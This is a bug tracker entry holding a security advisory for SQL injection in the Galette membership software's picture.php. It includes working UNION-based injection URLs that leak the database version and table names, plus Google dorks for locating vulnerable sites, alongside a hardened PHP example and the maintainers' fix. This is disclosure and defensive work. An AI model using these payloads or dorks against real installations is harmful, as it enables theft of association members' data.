Bug #250

closed

Security: SQL Injection in picture.php via param id_adh affecting versions 0.63, 0.63.1, 0.63.2, 0.63.3, 0.64rc1

Added by sbz sbz over 12 years ago. Updated over 12 years ago.

Status:
Closed
Priority:
Immediate
Category:
Core
Target version:
-
Start date:
05/09/2012
Due date:
% Done:

100%

Estimated time:
Version used:

Description

Hi developers,

I've discovered a SQL injection in the Galette software on the 0.63 branch version, and it seems not fixed according to the ChangeLog here [1]. The advisory is below:

Affected versions

It seems only the versions listed here are vulnerable:

  • 0.63
  • 0.63.1
  • 0.63.2
  • 0.63.3
  • 0.64rc1

Vulnerability

The vulnerability is located in the file includes/picture.class.php at lines 71-73 (cf. [2]):

  ...
  $sql = "SELECT picture,format
          FROM ".PREFIX_DB."pictures
          WHERE id_adh=".$id_adh;   // $id_adh is concatenated into the statement without escaping or casting
  ...

$id_adh is an input controlled by the user in the file picture.php and is not filtered at lines 35-36 (cf. [3]):

  ...
  else
      $id_adh = $_GET['id_adh'];   // raw query-string value, no validation
  ...

Exploitation

The queries below allow SQL injection to create a data leak in order to retrieve data on the database and server configuration on a fresh Galette installation:

- Leak MySQL version

/picture.php?id_adh=0+and+1=0+union+select+@@version,null

- Leak table names on MySQL 5.x (group_concat limits the output here)

/picture.php?id_adh=0+and+1=0+union+select+group_concat(table_name,char(10)),null+from+information_schema.tables

I don't want to show too many exploitable queries to avoid their use by kiddies, but it's possible to inject hard queries in order to leak adherents' data.

Impact of the vulnerability

Galette is a well-known adherent web interface used by lots of associations (especially French ones); it's possible to look for vulnerable targets using the Google dorks below:

  • inurl:self_adherent.php intitle:"Galette v0.63"
  • inurl:self_adherent.php intitle:Galette

The impact is database data leak exposure on any vulnerable Galette installation.

Mitigation of the vulnerability

Update to the 0.7.x version.

Discovered by

Sofian Brabez <>

Timeline

  • 09/05/2012: Contact vendor through bug tracker on redmine.ulysses.fr

References

[1] http://galette.tuxfamily.org//documentation/fr/changelog.html
[2] http://svn.gna.org/viewcvs/galette/branches/galette-0-63-bugfix/galette/includes/picture.class.php?revision=826&view=markup
http://git.tuxfamily.org/galette/galette?p=galette/galette.git;a=blob;f=includes/picture.class.php;h=9c4985eeb37369c9b64af6e11e6840645474fb2c;hb=7b4b477b0349f00c7555cbd66870ff6f22831faf#l70
[3] http://svn.gna.org/viewcvs/galette/branches/galette-0-63-bugfix/galette/picture.php?revision=825&view=markup
http://git.tuxfamily.org/galette/galette?p=galette/galette.git;a=blob;f=picture.php;h=8ec80ab9f67b66f2fced141d9512332cf64f334e;hb=7b4b477b0349f00c7555cbd66870ff6f22831faf#l35
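
The concatenation pattern from the report next to a hardened lookup, as an added example that is not Galette's own code or its fix. It assumes PHP 8 with the pdo_sqlite extension; the table name galette_pictures and its single row are constructed stand-ins for PREFIX_DB."pictures".

```php
<?php
// Added example (not Galette's code): the unsafe concatenation from
// picture.class.php beside a hardened version. An in-memory SQLite database
// through PDO stands in for MySQL so the script runs stand-alone; the table
// name and its one row are constructed data.
declare(strict_types=1);

$pdo = new PDO('sqlite::memory:');
$pdo->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
$pdo->exec('CREATE TABLE galette_pictures (id_adh INTEGER, picture BLOB, format TEXT)');
$pdo->exec("INSERT INTO galette_pictures VALUES (1, 'BINARYDATA', 'jpg')");

// Vulnerable: whatever arrives in ?id_adh= becomes part of the SQL text.
function picture_unsafe(PDO $pdo, string $id_adh): array|false
{
    $sql = "SELECT picture,format FROM galette_pictures WHERE id_adh=" . $id_adh;
    return $pdo->query($sql)->fetch(PDO::FETCH_ASSOC);
}

// Hardened: validate the type first, then bind the value so the database
// never parses it as SQL. Either measure alone stops this injection.
function picture_safe(PDO $pdo, string $id_adh): array|false
{
    $opts = ['options' => ['min_range' => 1]];
    if (filter_var($id_adh, FILTER_VALIDATE_INT, $opts) === false) {
        throw new InvalidArgumentException('id_adh must be a positive integer');
    }
    $stmt = $pdo->prepare('SELECT picture, format FROM galette_pictures WHERE id_adh = :id');
    $stmt->execute([':id' => (int) $id_adh]);
    return $stmt->fetch(PDO::FETCH_ASSOC);
}

// Input shaped like the report's first query (sqlite_version() replaces
// @@version): the unsafe path returns the server version in the "picture"
// column, the safe path refuses the request before any query is built.
$hostile = '0 and 1=0 union select sqlite_version(),null';

var_dump(picture_unsafe($pdo, $hostile));   // picture => "3.x.y", format => NULL
try {
    picture_safe($pdo, $hostile);
} catch (InvalidArgumentException $e) {
    echo "rejected: {$e->getMessage()}\n";
}
var_dump(picture_safe($pdo, '1'));          // the legitimate lookup still works
```

A detection angle for operators who cannot upgrade immediately: a non-numeric id_adh in the access log for picture.php is by itself a reliable indicator, since the legitimate value is always an integer.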

Actions #1

Updated by Johan Cwiklinski over 12 years ago

  • Status changed from New to In Progress

Actions #2

Updated by Johan Cwiklinski over 12 years ago

  • Description updated (diff)

Actions #3

Updated by Johan Cwiklinski over 12 years ago

  • % Done changed from 0 to 90
  • Status changed from In Progress to Resolved

Fixed in commit 8c13ec159b.

New releases will come very soon.

Actions #4

Updated by Johan Cwiklinski over 12 years ago

  • % Done changed from 90 to 100
  • Status changed from Resolved to Closed